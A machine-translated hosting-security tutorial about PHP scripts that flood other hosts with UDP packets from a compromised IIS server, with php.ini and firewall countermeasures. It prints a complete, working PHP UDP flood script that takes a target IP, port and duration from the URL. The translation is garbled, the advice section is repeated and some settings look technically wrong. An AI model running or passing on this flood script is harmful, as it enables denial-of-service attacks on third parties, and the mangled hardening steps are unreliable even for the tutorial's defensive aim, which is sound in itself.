Prevents users from running out of network bandwidth using the PHP code DOS
- 2020-03-31 21:35:55
- OfStack
PHP code to call sockets, direct use of the server network attack other IP, common code as follows:
Performance characteristics:
Once open IIS, the server's outflow bandwidth is used up -- that is, the server is constantly sending packets to others, which is different from being attacked by DDOS, which is constantly receiving a large number of packets.
Solutions:
Disable the above code:
In c:\ Windows \php.ini set:
Disable_functions = gzinflate;
Set the value to Off in c:\ Windows \php.ini
Allow_url_fopen = Off
And:
; The extension = php_sockets. DLL
In front of; The number must be there, meaning that sockets are restricted to use
In front of; No. Keep
And then restart IIS
If this still doesn't work, you can disable PHP extension testing in IIS, within the allowed extensions.
In addition, for unencrypted PHP attack code, you can also use the following methods:
1. In IP policy, or firewall, prohibit all udp outgoing
2. Monitor with first-class information, in SQL interception and address interception, intercept port= this keyword
$packets = 0;
$ip = $_GET['ip'];
$rand = $_GET['port'];
set_time_limit(0);
ignore_user_abort(FALSE);
$exec_time = $_GET['time'];
$time = time();
print "Flooded: $ip on port $rand
";
$max_time = $time+$exec_time;
for($i=0;$i<65535;$i++){
$out .= "X";
}
while(1){
$packets++;
if(time() > $max_time){
break;
}
$fp = fsockopen("udp://$ip", $rand, $errno, $errstr, 5);
if($fp){
fwrite($fp, $out);
fclose($fp);
}
}
echo "Packet complete at ".time('h:i:s')." with $packets (" . round(($packets*65)/1024, 2) . " mB) packets averaging ". round($packets/$exec_time, 2) . " packets/s \n";
?>
Performance characteristics:
Once open IIS, the server's outflow bandwidth is used up -- that is, the server is constantly sending packets to others, which is different from being attacked by DDOS, which is constantly receiving a large number of packets.
Solutions:
Disable the above code:
In c:\ Windows \php.ini set:
Disable_functions = gzinflate;
Set the value to Off in c:\ Windows \php.ini
Allow_url_fopen = Off
And:
; The extension = php_sockets. DLL
In front of; The number must be there, meaning that sockets are restricted to use
In front of; No. Keep
And then restart IIS
If this still doesn't work, you can disable PHP extension testing in IIS, within the allowed extensions.
In addition, for unencrypted PHP attack code, you can also use the following methods:
1. In IP policy, or firewall, prohibit all udp outgoing
2. Monitor with first-class information, in SQL interception and address interception, intercept port= this keyword